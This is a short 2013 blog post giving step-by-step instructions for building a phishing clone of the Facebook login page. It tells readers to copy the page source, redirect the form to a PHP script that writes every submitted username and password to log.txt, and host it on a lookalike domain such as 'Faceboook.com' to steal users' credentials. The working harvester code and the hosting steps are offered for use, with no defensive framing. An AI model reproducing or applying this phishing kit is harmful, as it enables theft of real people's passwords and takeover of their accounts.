Definition List

Saturday, 8 June 2013

Facebook hack

Hack facebook by makeing a fake page.

I will give you step wise instruction to make page that look like as same as facebook  login page.

Step:-1

first open the web facebook login page in your browser.

Step:-2

right click on the page empty area and  click on view soruceor in some browser it may be look as view soruce code.Copy that code in your notepad.

Step:-3

Change some text a given under find action="http" and replace it with action="login.php"

and method="post" replace it method="get".Save this file as with extension .html.

Step:-4

Now make a login method php script which is:

<?php
header ('Location: http://facebook.com');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

location url can be changed it depend on your choice where you want to send the user when he click login on your page.

Step:-5

Now register a domain on any hosting website and choose a domain name must look  as same as Facebook.com some difference should be exist in your url to make it unique .

an example:-Faceboook.com

Step:-6

Now go to your control panel of hosting and in file manger upload two files you make .then launch it.you almost done.

Final step:-

User who login by your fake page is now hacked by you username and password of this user is save in your log.txt file in your hosting.

Now enjoy it and hacked any page with this tricks.For more tricks comment on this post.

No comments:

Post a Comment